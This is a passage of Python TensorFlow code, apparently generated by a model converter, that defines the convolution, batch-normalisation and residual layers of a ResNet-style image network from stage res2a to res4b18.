res2a_branch2c = self.convolution(res2a_branch2b_relu, group=1, strides=[1, 1], padding='VALID',
name='res2a_branch2c')
bn2a_branch2c = self.batch_normalization(res2a_branch2c, variance_epsilon=9.99999974738e-06,
name='bn2a_branch2c')
res2a = bn2a_branch1 + bn2a_branch2c
res2a_relu = tf.nn.relu(res2a, name='res2a_relu')
res2b_branch2a = self.convolution(res2a_relu, group=1, strides=[1, 1], padding='VALID', name='res2b_branch2a')
bn2b_branch2a = self.batch_normalization(res2b_branch2a, variance_epsilon=9.99999974738e-06,
name='bn2b_branch2a')
res2b_branch2a_relu = tf.nn.relu(bn2b_branch2a, name='res2b_branch2a_relu')
res2b_branch2b_pad = tf.pad(res2b_branch2a_relu, paddings=[[0, 0], [1, 1], [1, 1], [0, 0]])
res2b_branch2b = self.convolution(res2b_branch2b_pad, group=1, strides=[1, 1], padding='VALID',
name='res2b_branch2b')
bn2b_branch2b = self.batch_normalization(res2b_branch2b, variance_epsilon=9.99999974738e-06,
name='bn2b_branch2b')
res2b_branch2b_relu = tf.nn.relu(bn2b_branch2b, name='res2b_branch2b_relu')
res2b_branch2c = self.convolution(res2b_branch2b_relu, group=1, strides=[1, 1], padding='VALID',
name='res2b_branch2c')
bn2b_branch2c = self.batch_normalization(res2b_branch2c, variance_epsilon=9.99999974738e-06,
name='bn2b_branch2c')
res2b = res2a_relu + bn2b_branch2c
res2b_relu = tf.nn.relu(res2b, name='res2b_relu')
res2c_branch2a = self.convolution(res2b_relu, group=1, strides=[1, 1], padding='VALID', name='res2c_branch2a')
bn2c_branch2a = self.batch_normalization(res2c_branch2a, variance_epsilon=9.99999974738e-06,
name='bn2c_branch2a')
res2c_branch2a_relu = tf.nn.relu(bn2c_branch2a, name='res2c_branch2a_relu')
res2c_branch2b_pad = tf.pad(res2c_branch2a_relu, paddings=[[0, 0], [1, 1], [1, 1], [0, 0]])
res2c_branch2b = self.convolution(res2c_branch2b_pad, group=1, strides=[1, 1], padding='VALID',
name='res2c_branch2b')
bn2c_branch2b = self.batch_normalization(res2c_branch2b, variance_epsilon=9.99999974738e-06,
name='bn2c_branch2b')
res2c_branch2b_relu = tf.nn.relu(bn2c_branch2b, name='res2c_branch2b_relu')
res2c_branch2c = self.convolution(res2c_branch2b_relu, group=1, strides=[1, 1], padding='VALID',
name='res2c_branch2c')
bn2c_branch2c = self.batch_normalization(res2c_branch2c, variance_epsilon=9.99999974738e-06,
name='bn2c_branch2c')
res2c = res2b_relu + bn2c_branch2c
res2c_relu = tf.nn.relu(res2c, name='res2c_relu')
res3a_branch1 = self.convolution(res2c_relu, group=1, strides=[2, 2], padding='VALID', name='res3a_branch1')
res3a_branch2a = self.convolution(res2c_relu, group=1, strides=[2, 2], padding='VALID', name='res3a_branch2a')
bn3a_branch1 = self.batch_normalization(res3a_branch1, variance_epsilon=9.99999974738e-06, name='bn3a_branch1')
bn3a_branch2a = self.batch_normalization(res3a_branch2a, variance_epsilon=9.99999974738e-06,
name='bn3a_branch2a')
res3a_branch2a_relu = tf.nn.relu(bn3a_branch2a, name='res3a_branch2a_relu')
res3a_branch2b_pad = tf.pad(res3a_branch2a_relu, paddings=[[0, 0], [1, 1], [1, 1], [0, 0]])
res3a_branch2b = self.convolution(res3a_branch2b_pad, group=1, strides=[1, 1], padding='VALID',
name='res3a_branch2b')
bn3a_branch2b = self.batch_normalization(res3a_branch2b, variance_epsilon=9.99999974738e-06,
name='bn3a_branch2b')
res3a_branch2b_relu = tf.nn.relu(bn3a_branch2b, name='res3a_branch2b_relu')
res3a_branch2c = self.convolution(res3a_branch2b_relu, group=1, strides=[1, 1], padding='VALID',
name='res3a_branch2c')
bn3a_branch2c = self.batch_normalization(res3a_branch2c, variance_epsilon=9.99999974738e-06,
name='bn3a_branch2c')
res3a = bn3a_branch1 + bn3a_branch2c
res3a_relu = tf.nn.relu(res3a, name='res3a_relu')
res3b1_branch2a = self.convolution(res3a_relu, group=1, strides=[1, 1], padding='VALID', name='res3b1_branch2a')
bn3b1_branch2a = self.batch_normalization(res3b1_branch2a, variance_epsilon=9.99999974738e-06,
name='bn3b1_branch2a')
res3b1_branch2a_relu = tf.nn.relu(bn3b1_branch2a, name='res3b1_branch2a_relu')
res3b1_branch2b_pad = tf.pad(res3b1_branch2a_relu, paddings=[[0, 0], [1, 1], [1, 1], [0, 0]])
res3b1_branch2b = self.convolution(res3b1_branch2b_pad, group=1, strides=[1, 1], padding='VALID',
name='res3b1_branch2b')
bn3b1_branch2b = self.batch_normalization(res3b1_branch2b, variance_epsilon=9.99999974738e-06,
name='bn3b1_branch2b')
res3b1_branch2b_relu = tf.nn.relu(bn3b1_branch2b, name='res3b1_branch2b_relu')
res3b1_branch2c = self.convolution(res3b1_branch2b_relu, group=1, strides=[1, 1], padding='VALID',
name='res3b1_branch2c')
bn3b1_branch2c = self.batch_normalization(res3b1_branch2c, variance_epsilon=9.99999974738e-06,
name='bn3b1_branch2c')
res3b1 = res3a_relu + bn3b1_branch2c
res3b1_relu = tf.nn.relu(res3b1, name='res3b1_relu')
res3b2_branch2a = self.convolution(res3b1_relu, group=1, strides=[1, 1], padding='VALID',
name='res3b2_branch2a')
bn3b2_branch2a = self.batch_normalization(res3b2_branch2a, variance_epsilon=9.99999974738e-06,
name='bn3b2_branch2a')
res3b2_branch2a_relu = tf.nn.relu(bn3b2_branch2a, name='res3b2_branch2a_relu')
res3b2_branch2b_pad = tf.pad(res3b2_branch2a_relu, paddings=[[0, 0], [1, 1], [1, 1], [0, 0]])
res3b2_branch2b = self.convolution(res3b2_branch2b_pad, group=1, strides=[1, 1], padding='VALID',
name='res3b2_branch2b')
bn3b2_branch2b = self.batch_normalization(res3b2_branch2b, variance_epsilon=9.99999974738e-06,
name='bn3b2_branch2b')
res3b2_branch2b_relu = tf.nn.relu(bn3b2_branch2b, name='res3b2_branch2b_relu')
res3b2_branch2c = self.convolution(res3b2_branch2b_relu, group=1, strides=[1, 1], padding='VALID',
name='res3b2_branch2c')
bn3b2_branch2c = self.batch_normalization(res3b2_branch2c, variance_epsilon=9.99999974738e-06,
name='bn3b2_branch2c')
res3b2 = res3b1_relu + bn3b2_branch2c
res3b2_relu = tf.nn.relu(res3b2, name='res3b2_relu')
res3b3_branch2a = self.convolution(res3b2_relu, group=1, strides=[1, 1], padding='VALID',
name='res3b3_branch2a')
bn3b3_branch2a = self.batch_normalization(res3b3_branch2a, variance_epsilon=9.99999974738e-06,
name='bn3b3_branch2a')
res3b3_branch2a_relu = tf.nn.relu(bn3b3_branch2a, name='res3b3_branch2a_relu')
res3b3_branch2b_pad = tf.pad(res3b3_branch2a_relu, paddings=[[0, 0], [1, 1], [1, 1], [0, 0]])
res3b3_branch2b = self.convolution(res3b3_branch2b_pad, group=1, strides=[1, 1], padding='VALID',
name='res3b3_branch2b')
bn3b3_branch2b = self.batch_normalization(res3b3_branch2b, variance_epsilon=9.99999974738e-06,
name='bn3b3_branch2b')
res3b3_branch2b_relu = tf.nn.relu(bn3b3_branch2b, name='res3b3_branch2b_relu')
res3b3_branch2c = self.convolution(res3b3_branch2b_relu, group=1, strides=[1, 1], padding='VALID',
name='res3b3_branch2c')
bn3b3_branch2c = self.batch_normalization(res3b3_branch2c, variance_epsilon=9.99999974738e-06,
name='bn3b3_branch2c')
res3b3 = res3b2_relu + bn3b3_branch2c
res3b3_relu = tf.nn.relu(res3b3, name='res3b3_relu')
res4a_branch1 = self.convolution(res3b3_relu, group=1, strides=[2, 2], padding='VALID', name='res4a_branch1')
res4a_branch2a = self.convolution(res3b3_relu, group=1, strides=[2, 2], padding='VALID', name='res4a_branch2a')
bn4a_branch1 = self.batch_normalization(res4a_branch1, variance_epsilon=9.99999974738e-06, name='bn4a_branch1')
bn4a_branch2a = self.batch_normalization(res4a_branch2a, variance_epsilon=9.99999974738e-06,
name='bn4a_branch2a')
res4a_branch2a_relu = tf.nn.relu(bn4a_branch2a, name='res4a_branch2a_relu')
res4a_branch2b_pad = tf.pad(res4a_branch2a_relu, paddings=[[0, 0], [1, 1], [1, 1], [0, 0]])
res4a_branch2b = self.convolution(res4a_branch2b_pad, group=1, strides=[1, 1], padding='VALID',
name='res4a_branch2b')
bn4a_branch2b = self.batch_normalization(res4a_branch2b, variance_epsilon=9.99999974738e-06,
name='bn4a_branch2b')
res4a_branch2b_relu = tf.nn.relu(bn4a_branch2b, name='res4a_branch2b_relu')
res4a_branch2c = self.convolution(res4a_branch2b_relu, group=1, strides=[1, 1], padding='VALID',
name='res4a_branch2c')
bn4a_branch2c = self.batch_normalization(res4a_branch2c, variance_epsilon=9.99999974738e-06,
name='bn4a_branch2c')
res4a = bn4a_branch1 + bn4a_branch2c
res4a_relu = tf.nn.relu(res4a, name='res4a_relu')
res4b1_branch2a = self.convolution(res4a_relu, group=1, strides=[1, 1], padding='VALID', name='res4b1_branch2a')
bn4b1_branch2a = self.batch_normalization(res4b1_branch2a, variance_epsilon=9.99999974738e-06,
name='bn4b1_branch2a')
res4b1_branch2a_relu = tf.nn.relu(bn4b1_branch2a, name='res4b1_branch2a_relu')
res4b1_branch2b_pad = tf.pad(res4b1_branch2a_relu, paddings=[[0, 0], [1, 1], [1, 1], [0, 0]])
res4b1_branch2b = self.convolution(res4b1_branch2b_pad, group=1, strides=[1, 1], padding='VALID',
name='res4b1_branch2b')
bn4b1_branch2b = self.batch_normalization(res4b1_branch2b, variance_epsilon=9.99999974738e-06,
name='bn4b1_branch2b')
res4b1_branch2b_relu = tf.nn.relu(bn4b1_branch2b, name='res4b1_branch2b_relu')
res4b1_branch2c = self.convolution(res4b1_branch2b_relu, group=1, strides=[1, 1], padding='VALID',
name='res4b1_branch2c')
bn4b1_branch2c = self.batch_normalization(res4b1_branch2c, variance_epsilon=9.99999974738e-06,
name='bn4b1_branch2c')
res4b1 = res4a_relu + bn4b1_branch2c
res4b1_relu = tf.nn.relu(res4b1, name='res4b1_relu')
res4b2_branch2a = self.convolution(res4b1_relu, group=1, strides=[1, 1], padding='VALID',
name='res4b2_branch2a')
bn4b2_branch2a = self.batch_normalization(res4b2_branch2a, variance_epsilon=9.99999974738e-06,
name='bn4b2_branch2a')
res4b2_branch2a_relu = tf.nn.relu(bn4b2_branch2a, name='res4b2_branch2a_relu')
res4b2_branch2b_pad = tf.pad(res4b2_branch2a_relu, paddings=[[0, 0], [1, 1], [1, 1], [0, 0]])
res4b2_branch2b = self.convolution(res4b2_branch2b_pad, group=1, strides=[1, 1], padding='VALID',
name='res4b2_branch2b')
bn4b2_branch2b = self.batch_normalization(res4b2_branch2b, variance_epsilon=9.99999974738e-06,
name='bn4b2_branch2b')
res4b2_branch2b_relu = tf.nn.relu(bn4b2_branch2b, name='res4b2_branch2b_relu')
res4b2_branch2c = self.convolution(res4b2_branch2b_relu, group=1, strides=[1, 1], padding='VALID',
name='res4b2_branch2c')
bn4b2_branch2c = self.batch_normalization(res4b2_branch2c, variance_epsilon=9.99999974738e-06,
name='bn4b2_branch2c')
res4b2 = res4b1_relu + bn4b2_branch2c
res4b2_relu = tf.nn.relu(res4b2, name='res4b2_relu')
res4b3_branch2a = self.convolution(res4b2_relu, group=1, strides=[1, 1], padding='VALID',
name='res4b3_branch2a')
bn4b3_branch2a = self.batch_normalization(res4b3_branch2a, variance_epsilon=9.99999974738e-06,
name='bn4b3_branch2a')
res4b3_branch2a_relu = tf.nn.relu(bn4b3_branch2a, name='res4b3_branch2a_relu')
res4b3_branch2b_pad = tf.pad(res4b3_branch2a_relu, paddings=[[0, 0], [1, 1], [1, 1], [0, 0]])
res4b3_branch2b = self.convolution(res4b3_branch2b_pad, group=1, strides=[1, 1], padding='VALID',
name='res4b3_branch2b')
bn4b3_branch2b = self.batch_normalization(res4b3_branch2b, variance_epsilon=9.99999974738e-06,
name='bn4b3_branch2b')
res4b3_branch2b_relu = tf.nn.relu(bn4b3_branch2b, name='res4b3_branch2b_relu')
res4b3_branch2c = self.convolution(res4b3_branch2b_relu, group=1, strides=[1, 1], padding='VALID',
name='res4b3_branch2c')
bn4b3_branch2c = self.batch_normalization(res4b3_branch2c, variance_epsilon=9.99999974738e-06,
name='bn4b3_branch2c')
res4b3 = res4b2_relu + bn4b3_branch2c
res4b3_relu = tf.nn.relu(res4b3, name='res4b3_relu')
res4b4_branch2a = self.convolution(res4b3_relu, group=1, strides=[1, 1], padding='VALID',
name='res4b4_branch2a')
bn4b4_branch2a = self.batch_normalization(res4b4_branch2a, variance_epsilon=9.99999974738e-06,
name='bn4b4_branch2a')
res4b4_branch2a_relu = tf.nn.relu(bn4b4_branch2a, name='res4b4_branch2a_relu')
res4b4_branch2b_pad = tf.pad(res4b4_branch2a_relu, paddings=[[0, 0], [1, 1], [1, 1], [0, 0]])
res4b4_branch2b = self.convolution(res4b4_branch2b_pad, group=1, strides=[1, 1], padding='VALID',
name='res4b4_branch2b')
bn4b4_branch2b = self.batch_normalization(res4b4_branch2b, variance_epsilon=9.99999974738e-06,
name='bn4b4_branch2b')
res4b4_branch2b_relu = tf.nn.relu(bn4b4_branch2b, name='res4b4_branch2b_relu')
res4b4_branch2c = self.convolution(res4b4_branch2b_relu, group=1, strides=[1, 1], padding='VALID',
name='res4b4_branch2c')
bn4b4_branch2c = self.batch_normalization(res4b4_branch2c, variance_epsilon=9.99999974738e-06,
name='bn4b4_branch2c')
res4b4 = res4b3_relu + bn4b4_branch2c
res4b4_relu = tf.nn.relu(res4b4, name='res4b4_relu')
res4b5_branch2a = self.convolution(res4b4_relu, group=1, strides=[1, 1], padding='VALID',
name='res4b5_branch2a')
bn4b5_branch2a = self.batch_normalization(res4b5_branch2a, variance_epsilon=9.99999974738e-06,
name='bn4b5_branch2a')
res4b5_branch2a_relu = tf.nn.relu(bn4b5_branch2a, name='res4b5_branch2a_relu')
res4b5_branch2b_pad = tf.pad(res4b5_branch2a_relu, paddings=[[0, 0], [1, 1], [1, 1], [0, 0]])
res4b5_branch2b = self.convolution(res4b5_branch2b_pad, group=1, strides=[1, 1], padding='VALID',
name='res4b5_branch2b')
bn4b5_branch2b = self.batch_normalization(res4b5_branch2b, variance_epsilon=9.99999974738e-06,
name='bn4b5_branch2b')
res4b5_branch2b_relu = tf.nn.relu(bn4b5_branch2b, name='res4b5_branch2b_relu')
res4b5_branch2c = self.convolution(res4b5_branch2b_relu, group=1, strides=[1, 1], padding='VALID',
name='res4b5_branch2c')
bn4b5_branch2c = self.batch_normalization(res4b5_branch2c, variance_epsilon=9.99999974738e-06,
name='bn4b5_branch2c')
res4b5 = res4b4_relu + bn4b5_branch2c
res4b5_relu = tf.nn.relu(res4b5, name='res4b5_relu')
res4b6_branch2a = self.convolution(res4b5_relu, group=1, strides=[1, 1], padding='VALID',
name='res4b6_branch2a')
bn4b6_branch2a = self.batch_normalization(res4b6_branch2a, variance_epsilon=9.99999974738e-06,
name='bn4b6_branch2a')
res4b6_branch2a_relu = tf.nn.relu(bn4b6_branch2a, name='res4b6_branch2a_relu')
res4b6_branch2b_pad = tf.pad(res4b6_branch2a_relu, paddings=[[0, 0], [1, 1], [1, 1], [0, 0]])
res4b6_branch2b = self.convolution(res4b6_branch2b_pad, group=1, strides=[1, 1], padding='VALID',
name='res4b6_branch2b')
bn4b6_branch2b = self.batch_normalization(res4b6_branch2b, variance_epsilon=9.99999974738e-06,
name='bn4b6_branch2b')
res4b6_branch2b_relu = tf.nn.relu(bn4b6_branch2b, name='res4b6_branch2b_relu')
res4b6_branch2c = self.convolution(res4b6_branch2b_relu, group=1, strides=[1, 1], padding='VALID',
name='res4b6_branch2c')
bn4b6_branch2c = self.batch_normalization(res4b6_branch2c, variance_epsilon=9.99999974738e-06,
name='bn4b6_branch2c')
res4b6 = res4b5_relu + bn4b6_branch2c
res4b6_relu = tf.nn.relu(res4b6, name='res4b6_relu')
res4b7_branch2a = self.convolution(res4b6_relu, group=1, strides=[1, 1], padding='VALID',
name='res4b7_branch2a')
bn4b7_branch2a = self.batch_normalization(res4b7_branch2a, variance_epsilon=9.99999974738e-06,
name='bn4b7_branch2a')
res4b7_branch2a_relu = tf.nn.relu(bn4b7_branch2a, name='res4b7_branch2a_relu')
res4b7_branch2b_pad = tf.pad(res4b7_branch2a_relu, paddings=[[0, 0], [1, 1], [1, 1], [0, 0]])
res4b7_branch2b = self.convolution(res4b7_branch2b_pad, group=1, strides=[1, 1], padding='VALID',
name='res4b7_branch2b')
bn4b7_branch2b = self.batch_normalization(res4b7_branch2b, variance_epsilon=9.99999974738e-06,
name='bn4b7_branch2b')
res4b7_branch2b_relu = tf.nn.relu(bn4b7_branch2b, name='res4b7_branch2b_relu')
res4b7_branch2c = self.convolution(res4b7_branch2b_relu, group=1, strides=[1, 1], padding='VALID',
name='res4b7_branch2c')
bn4b7_branch2c = self.batch_normalization(res4b7_branch2c, variance_epsilon=9.99999974738e-06,
name='bn4b7_branch2c')
res4b7 = res4b6_relu + bn4b7_branch2c
res4b7_relu = tf.nn.relu(res4b7, name='res4b7_relu')
res4b8_branch2a = self.convolution(res4b7_relu, group=1, strides=[1, 1], padding='VALID',
name='res4b8_branch2a')
bn4b8_branch2a = self.batch_normalization(res4b8_branch2a, variance_epsilon=9.99999974738e-06,
name='bn4b8_branch2a')
res4b8_branch2a_relu = tf.nn.relu(bn4b8_branch2a, name='res4b8_branch2a_relu')
res4b8_branch2b_pad = tf.pad(res4b8_branch2a_relu, paddings=[[0, 0], [1, 1], [1, 1], [0, 0]])
res4b8_branch2b = self.convolution(res4b8_branch2b_pad, group=1, strides=[1, 1], padding='VALID',
name='res4b8_branch2b')
bn4b8_branch2b = self.batch_normalization(res4b8_branch2b, variance_epsilon=9.99999974738e-06,
name='bn4b8_branch2b')
res4b8_branch2b_relu = tf.nn.relu(bn4b8_branch2b, name='res4b8_branch2b_relu')
res4b8_branch2c = self.convolution(res4b8_branch2b_relu, group=1, strides=[1, 1], padding='VALID',
name='res4b8_branch2c')
bn4b8_branch2c = self.batch_normalization(res4b8_branch2c, variance_epsilon=9.99999974738e-06,
name='bn4b8_branch2c')
res4b8 = res4b7_relu + bn4b8_branch2c
res4b8_relu = tf.nn.relu(res4b8, name='res4b8_relu')
res4b9_branch2a = self.convolution(res4b8_relu, group=1, strides=[1, 1], padding='VALID',
name='res4b9_branch2a')
bn4b9_branch2a = self.batch_normalization(res4b9_branch2a, variance_epsilon=9.99999974738e-06,
name='bn4b9_branch2a')
res4b9_branch2a_relu = tf.nn.relu(bn4b9_branch2a, name='res4b9_branch2a_relu')
res4b9_branch2b_pad = tf.pad(res4b9_branch2a_relu, paddings=[[0, 0], [1, 1], [1, 1], [0, 0]])
res4b9_branch2b = self.convolution(res4b9_branch2b_pad, group=1, strides=[1, 1], padding='VALID',
name='res4b9_branch2b')
bn4b9_branch2b = self.batch_normalization(res4b9_branch2b, variance_epsilon=9.99999974738e-06,
name='bn4b9_branch2b')
res4b9_branch2b_relu = tf.nn.relu(bn4b9_branch2b, name='res4b9_branch2b_relu')
res4b9_branch2c = self.convolution(res4b9_branch2b_relu, group=1, strides=[1, 1], padding='VALID',
name='res4b9_branch2c')
bn4b9_branch2c = self.batch_normalization(res4b9_branch2c, variance_epsilon=9.99999974738e-06,
name='bn4b9_branch2c')
res4b9 = res4b8_relu + bn4b9_branch2c
res4b9_relu = tf.nn.relu(res4b9, name='res4b9_relu')
res4b10_branch2a = self.convolution(res4b9_relu, group=1, strides=[1, 1], padding='VALID',
name='res4b10_branch2a')
bn4b10_branch2a = self.batch_normalization(res4b10_branch2a, variance_epsilon=9.99999974738e-06,
name='bn4b10_branch2a')
res4b10_branch2a_relu = tf.nn.relu(bn4b10_branch2a, name='res4b10_branch2a_relu')
res4b10_branch2b_pad = tf.pad(res4b10_branch2a_relu, paddings=[[0, 0], [1, 1], [1, 1], [0, 0]])
res4b10_branch2b = self.convolution(res4b10_branch2b_pad, group=1, strides=[1, 1], padding='VALID',
name='res4b10_branch2b')
bn4b10_branch2b = self.batch_normalization(res4b10_branch2b, variance_epsilon=9.99999974738e-06,
name='bn4b10_branch2b')
res4b10_branch2b_relu = tf.nn.relu(bn4b10_branch2b, name='res4b10_branch2b_relu')
res4b10_branch2c = self.convolution(res4b10_branch2b_relu, group=1, strides=[1, 1], padding='VALID',
name='res4b10_branch2c')
bn4b10_branch2c = self.batch_normalization(res4b10_branch2c, variance_epsilon=9.99999974738e-06,
name='bn4b10_branch2c')
res4b10 = res4b9_relu + bn4b10_branch2c
res4b10_relu = tf.nn.relu(res4b10, name='res4b10_relu')
res4b11_branch2a = self.convolution(res4b10_relu, group=1, strides=[1, 1], padding='VALID',
name='res4b11_branch2a')
bn4b11_branch2a = self.batch_normalization(res4b11_branch2a, variance_epsilon=9.99999974738e-06,
name='bn4b11_branch2a')
res4b11_branch2a_relu = tf.nn.relu(bn4b11_branch2a, name='res4b11_branch2a_relu')
res4b11_branch2b_pad = tf.pad(res4b11_branch2a_relu, paddings=[[0, 0], [1, 1], [1, 1], [0, 0]])
res4b11_branch2b = self.convolution(res4b11_branch2b_pad, group=1, strides=[1, 1], padding='VALID',
name='res4b11_branch2b')
bn4b11_branch2b = self.batch_normalization(res4b11_branch2b, variance_epsilon=9.99999974738e-06,
name='bn4b11_branch2b')
res4b11_branch2b_relu = tf.nn.relu(bn4b11_branch2b, name='res4b11_branch2b_relu')
res4b11_branch2c = self.convolution(res4b11_branch2b_relu, group=1, strides=[1, 1], padding='VALID',
name='res4b11_branch2c')
bn4b11_branch2c = self.batch_normalization(res4b11_branch2c, variance_epsilon=9.99999974738e-06,
name='bn4b11_branch2c')
res4b11 = res4b10_relu + bn4b11_branch2c
res4b11_relu = tf.nn.relu(res4b11, name='res4b11_relu')
res4b12_branch2a = self.convolution(res4b11_relu, group=1, strides=[1, 1], padding='VALID',
name='res4b12_branch2a')
bn4b12_branch2a = self.batch_normalization(res4b12_branch2a, variance_epsilon=9.99999974738e-06,
name='bn4b12_branch2a')
res4b12_branch2a_relu = tf.nn.relu(bn4b12_branch2a, name='res4b12_branch2a_relu')
res4b12_branch2b_pad = tf.pad(res4b12_branch2a_relu, paddings=[[0, 0], [1, 1], [1, 1], [0, 0]])
res4b12_branch2b = self.convolution(res4b12_branch2b_pad, group=1, strides=[1, 1], padding='VALID',
name='res4b12_branch2b')
bn4b12_branch2b = self.batch_normalization(res4b12_branch2b, variance_epsilon=9.99999974738e-06,
name='bn4b12_branch2b')
res4b12_branch2b_relu = tf.nn.relu(bn4b12_branch2b, name='res4b12_branch2b_relu')
res4b12_branch2c = self.convolution(res4b12_branch2b_relu, group=1, strides=[1, 1], padding='VALID',
name='res4b12_branch2c')
bn4b12_branch2c = self.batch_normalization(res4b12_branch2c, variance_epsilon=9.99999974738e-06,
name='bn4b12_branch2c')
res4b12 = res4b11_relu + bn4b12_branch2c
res4b12_relu = tf.nn.relu(res4b12, name='res4b12_relu')
res4b13_branch2a = self.convolution(res4b12_relu, group=1, strides=[1, 1], padding='VALID',
name='res4b13_branch2a')
bn4b13_branch2a = self.batch_normalization(res4b13_branch2a, variance_epsilon=9.99999974738e-06,
name='bn4b13_branch2a')
res4b13_branch2a_relu = tf.nn.relu(bn4b13_branch2a, name='res4b13_branch2a_relu')
res4b13_branch2b_pad = tf.pad(res4b13_branch2a_relu, paddings=[[0, 0], [1, 1], [1, 1], [0, 0]])
res4b13_branch2b = self.convolution(res4b13_branch2b_pad, group=1, strides=[1, 1], padding='VALID',
name='res4b13_branch2b')
bn4b13_branch2b = self.batch_normalization(res4b13_branch2b, variance_epsilon=9.99999974738e-06,
name='bn4b13_branch2b')
res4b13_branch2b_relu = tf.nn.relu(bn4b13_branch2b, name='res4b13_branch2b_relu')
res4b13_branch2c = self.convolution(res4b13_branch2b_relu, group=1, strides=[1, 1], padding='VALID',
name='res4b13_branch2c')
bn4b13_branch2c = self.batch_normalization(res4b13_branch2c, variance_epsilon=9.99999974738e-06,
name='bn4b13_branch2c')
res4b13 = res4b12_relu + bn4b13_branch2c
res4b13_relu = tf.nn.relu(res4b13, name='res4b13_relu')
res4b14_branch2a = self.convolution(res4b13_relu, group=1, strides=[1, 1], padding='VALID',
name='res4b14_branch2a')
bn4b14_branch2a = self.batch_normalization(res4b14_branch2a, variance_epsilon=9.99999974738e-06,
name='bn4b14_branch2a')
res4b14_branch2a_relu = tf.nn.relu(bn4b14_branch2a, name='res4b14_branch2a_relu')
res4b14_branch2b_pad = tf.pad(res4b14_branch2a_relu, paddings=[[0, 0], [1, 1], [1, 1], [0, 0]])
res4b14_branch2b = self.convolution(res4b14_branch2b_pad, group=1, strides=[1, 1], padding='VALID',
name='res4b14_branch2b')
bn4b14_branch2b = self.batch_normalization(res4b14_branch2b, variance_epsilon=9.99999974738e-06,
name='bn4b14_branch2b')
res4b14_branch2b_relu = tf.nn.relu(bn4b14_branch2b, name='res4b14_branch2b_relu')
res4b14_branch2c = self.convolution(res4b14_branch2b_relu, group=1, strides=[1, 1], padding='VALID',
name='res4b14_branch2c')
bn4b14_branch2c = self.batch_normalization(res4b14_branch2c, variance_epsilon=9.99999974738e-06,
name='bn4b14_branch2c')
res4b14 = res4b13_relu + bn4b14_branch2c
res4b14_relu = tf.nn.relu(res4b14, name='res4b14_relu')
res4b15_branch2a = self.convolution(res4b14_relu, group=1, strides=[1, 1], padding='VALID',
name='res4b15_branch2a')
bn4b15_branch2a = self.batch_normalization(res4b15_branch2a, variance_epsilon=9.99999974738e-06,
name='bn4b15_branch2a')
res4b15_branch2a_relu = tf.nn.relu(bn4b15_branch2a, name='res4b15_branch2a_relu')
res4b15_branch2b_pad = tf.pad(res4b15_branch2a_relu, paddings=[[0, 0], [1, 1], [1, 1], [0, 0]])
res4b15_branch2b = self.convolution(res4b15_branch2b_pad, group=1, strides=[1, 1], padding='VALID',
name='res4b15_branch2b')
bn4b15_branch2b = self.batch_normalization(res4b15_branch2b, variance_epsilon=9.99999974738e-06,
name='bn4b15_branch2b')
res4b15_branch2b_relu = tf.nn.relu(bn4b15_branch2b, name='res4b15_branch2b_relu')
res4b15_branch2c = self.convolution(res4b15_branch2b_relu, group=1, strides=[1, 1], padding='VALID',
name='res4b15_branch2c')
bn4b15_branch2c = self.batch_normalization(res4b15_branch2c, variance_epsilon=9.99999974738e-06,
name='bn4b15_branch2c')
res4b15 = res4b14_relu + bn4b15_branch2c
res4b15_relu = tf.nn.relu(res4b15, name='res4b15_relu')
res4b16_branch2a = self.convolution(res4b15_relu, group=1, strides=[1, 1], padding='VALID',
name='res4b16_branch2a')
bn4b16_branch2a = self.batch_normalization(res4b16_branch2a, variance_epsilon=9.99999974738e-06,
name='bn4b16_branch2a')
res4b16_branch2a_relu = tf.nn.relu(bn4b16_branch2a, name='res4b16_branch2a_relu')
res4b16_branch2b_pad = tf.pad(res4b16_branch2a_relu, paddings=[[0, 0], [1, 1], [1, 1], [0, 0]])
res4b16_branch2b = self.convolution(res4b16_branch2b_pad, group=1, strides=[1, 1], padding='VALID',
name='res4b16_branch2b')
bn4b16_branch2b = self.batch_normalization(res4b16_branch2b, variance_epsilon=9.99999974738e-06,
name='bn4b16_branch2b')
res4b16_branch2b_relu = tf.nn.relu(bn4b16_branch2b, name='res4b16_branch2b_relu')
res4b16_branch2c = self.convolution(res4b16_branch2b_relu, group=1, strides=[1, 1], padding='VALID',
name='res4b16_branch2c')
bn4b16_branch2c = self.batch_normalization(res4b16_branch2c, variance_epsilon=9.99999974738e-06,
name='bn4b16_branch2c')
res4b16 = res4b15_relu + bn4b16_branch2c
res4b16_relu = tf.nn.relu(res4b16, name='res4b16_relu')
res4b17_branch2a = self.convolution(res4b16_relu, group=1, strides=[1, 1], padding='VALID',
name='res4b17_branch2a')
bn4b17_branch2a = self.batch_normalization(res4b17_branch2a, variance_epsilon=9.99999974738e-06,
name='bn4b17_branch2a')
res4b17_branch2a_relu = tf.nn.relu(bn4b17_branch2a, name='res4b17_branch2a_relu')
res4b17_branch2b_pad = tf.pad(res4b17_branch2a_relu, paddings=[[0, 0], [1, 1], [1, 1], [0, 0]])
res4b17_branch2b = self.convolution(res4b17_branch2b_pad, group=1, strides=[1, 1], padding='VALID',
name='res4b17_branch2b')
bn4b17_branch2b = self.batch_normalization(res4b17_branch2b, variance_epsilon=9.99999974738e-06,
name='bn4b17_branch2b')
res4b17_branch2b_relu = tf.nn.relu(bn4b17_branch2b, name='res4b17_branch2b_relu')
res4b17_branch2c = self.convolution(res4b17_branch2b_relu, group=1, strides=[1, 1], padding='VALID',
name='res4b17_branch2c')
bn4b17_branch2c = self.batch_normalization(res4b17_branch2c, variance_epsilon=9.99999974738e-06,
name='bn4b17_branch2c')
res4b17 = res4b16_relu + bn4b17_branch2c
res4b17_relu = tf.nn.relu(res4b17, name='res4b17_relu')
res4b18_branch2a = self.convolution(res4b17_relu, group=1, strides=[1, 1], padding='VALID',
name='res4b18_branch2a')
bn4b18_branch2a = self.batch_normalization(res4b18_branch2a, variance_epsilon=9.99999974738e-06,
name='bn4b18_branch2a')
res4b18_branch2a_relu = tf.nn.relu(bn4b18_branch2a, name='res4b18_branch2a_relu')
res4b18_branch2b_pad = tf.pad(res4b18_branch2a_relu, paddings=[[0, 0], [1, 1], [1, 1], [0, 0]])
res4b18_branch2b = self.convolution(res4b18_branch2b_pad, group=1, strides=[1, 1], padding='VALID',
name='res4b18_branch2b')
bn4b18_branch2b = self.batch_normalization(res4b18_branch2b, variance_epsilon=9.99999974738e-06,
name='bn4b18_branch2b')
res4b18_branch2b_relu = tf.nn.relu(bn4b18_branch2b, name='res4b18_branch2b_relu')
res4b18_branch2c = self.convolution(res4b18_branch2b_relu, group=1, strides=[1, 1], padding='VALID',
name='res4b18_branch2c')
bn4b18_branch2c = self.batch_normalization(res4b18_branch2c, variance_epsilon=9.99999974738e-06,
